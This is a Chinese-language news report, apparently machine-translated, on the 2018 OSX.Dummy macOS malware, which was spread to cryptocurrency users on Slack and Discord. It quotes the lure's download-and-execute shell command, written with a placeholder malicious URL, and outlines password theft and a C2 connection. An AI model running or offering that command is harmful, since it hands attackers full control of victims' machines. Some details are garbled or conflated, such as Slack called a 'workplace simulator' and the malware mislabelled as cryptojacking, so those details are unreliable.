Discord和Slack Cryptocurrency用户遭到恶意“加密攻击”软件攻击

作者:xiaoyao 2018-07-03 浏览:30609
导读: 据称,黑客在工作场所模拟器Slack和游戏论坛Discord上针对以加密货币为重点的群体,讨论使用“加密劫持”软件渗透计算机的加密货币。Discord和Slack用户受到影响被确定为OSX.Dummy,基于MacOS的恶意软件并不像其他巧妙编写的黑客代码那样复杂,但却允许“可以嵌入到机器上的任意代码...

Discord and Slack Cryptocurrency Users Hit by Malicious “Cryptojacking” Software

据称,黑客在工作场所模拟器Slack和游戏论坛Discord上针对以加密货币为重点的群体,讨论使用“加密劫持”软件渗透计算机的加密货币。

Discord和Slack用户受到影响

被确定为OSX.Dummy,基于MacOS的恶意软件并不像其他巧妙编写的黑客代码那样复杂,但却允许“可以嵌入到机器上的任意代码执行”。

如上所述 ,来自网络安全联盟Unix的研究人员发现了OSX.Dummy的证据,SANS'InfoSec的Remco Verhoef 在2018年6月30日 确认 了对macOS Slack应用程序的一系列恶意攻击。

据报道,Discord和Slack的几个聊天室已经向系统管理员提出了一些问题,即系统管理员冒充有影响力的小组成员,并发送一个毫无疑问的链接到“有用的”加密货币移动应用程序。

恶意代码

在安装时,应用程序下载并执行二进制脚本“cd / tmp && curl -s curl $ MALICIOUS_URL> script && chmod + x script && ./script。”该脚本是一个34 MB的文件,包含OSX.Dummy软件。

该脚本是一个“常规”mach064二进制文件,并在MacOs系统上执行。 由于其默默无闻,在线恶意软件扫描程序和内置防病毒软件无法将代码识别为威胁。

通常,由于定义的安全协议,无符号二进制OSX.Dummy文件无法在OS上运行。 但是,macOS安全子例程“Gatekeeper ”不会检查用户专门下载并在系统终端中运行的文件,这显然是运行“有用”软件的唯一方法。

随后,软件提示用户输入其主密码,该密码提供对受害系统的所有基础数据,功能和密码的未授权代码访问。 最后一步,受害计算机自动连接到C2服务器,使攻击者可以完全访问该计算机。

由于受害者来自与加密货币相关的论坛,此过程使攻击者可以直接访问用户的私人地址,电子邮件,密码和安全密钥,证明这是一个基本但有效的“加密劫持”过程。

Cryptojacking的新网络威胁被宽泛地定义为黑客渗透受害者的计算机以利用其处理能力挖掘加密货币。 然而,企业和用户所采取的相对较低的安全措施使得加密货币部门成为一个软性且高利润的目标。 正如BTCManager在2018年6月报道的那样 , 仅在2018年,从受害者计算机中挖掘加密货币的非法活动就飙升了629%,攻击者没有显示出任何时间停止的迹象。


转载请注明出处:xiaoyao,如有疑问,请联系(13789339)。
本文地址:https://www.chinajj.org.cn/post/1916.html